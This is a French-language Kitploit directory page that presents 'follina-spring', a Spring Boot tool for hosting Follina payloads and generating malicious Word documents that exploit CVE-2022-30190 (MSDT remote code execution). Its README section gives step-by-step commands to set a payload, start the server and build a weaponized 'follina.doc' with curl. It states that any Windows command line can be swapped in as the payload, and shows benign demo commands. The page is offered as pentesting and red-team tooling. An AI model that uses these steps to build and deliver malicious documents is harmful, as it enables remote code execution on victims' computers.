Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
follina-spring — Serveur pour héberger/activer des payloads Follina et générateur de documents Word malveillants exploitant le protocole MS-MSDT. (CVE-2022-30190) | Kitploit
Outils/GitHubGitHub/dsibilio/follina-spring
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubdsibilio/follina-spring

follina-spring

Serveur pour héberger/activer des payloads Follina et générateur de documents Word malveillants exploitant le protocole MS-MSDT. (CVE-2022-30190)

Voir le dépôt
4il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation de MS-MSDT Follina avec Spring Boot

Ce dépôt contient une simple application Spring Boot qui agit à la fois comme un serveur pour héberger/activer des charges utiles Follina, et comme un générateur de documents Word malveillants prêts à être utilisés comme vecteurs d'attaque pour exploiter CVE-2022-30190.

Cette vulnérabilité consiste en une exécution de code à distance via MSDT (Microsoft Windows Support Diagnostic Tool).

Charge utile côté serveur

Pour servir une charge utile unique de votre choix, vous devez :

  • définir la charge utile, par exemple :
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • exécuter le serveur pour héberger la charge utile statique :
root@kitploit:~
mvn spring-boot:run
  • générer le document Word « Follina » :
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

Si vous souhaitez modifier la charge utile actuelle, vous devez d'abord arrêter le serveur actif, puis répéter les étapes après avoir défini la nouvelle charge utile.

REMARQUE : la charge utile peut être remplacée par n'importe quelle autre commande, à condition qu'elle puisse être exécutée via l'invite de commandes Windows.

Charge utile côté client

Pour servir une charge utile côté client de votre choix, vous devez :

  • exécuter le serveur pour activer les charges utiles à l'exécution :
root@kitploit:~
mvn spring-boot:run
  • générer le document Word « Follina » en spécifiant le paramètre de requête cmd, par exemple :
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

Dans ce cas, la charge utile est intégrée dans le document, et aura simplement besoin d'être activée en contactant le serveur. De cette façon, vous pouvez avoir plusieurs charges utiles différentes réparties sur différents documents et vous n'aurez pas à redémarrer le serveur pour déclencher des modifications de charge utile - vous pouvez simplement générer un nouveau document avec la charge utile souhaitée intégrée.

Remerciements

Un grand merci à John Hammond pour avoir proposé l'implémentation Python, et partagé son analyse de la CVE.

Télécharger l’outil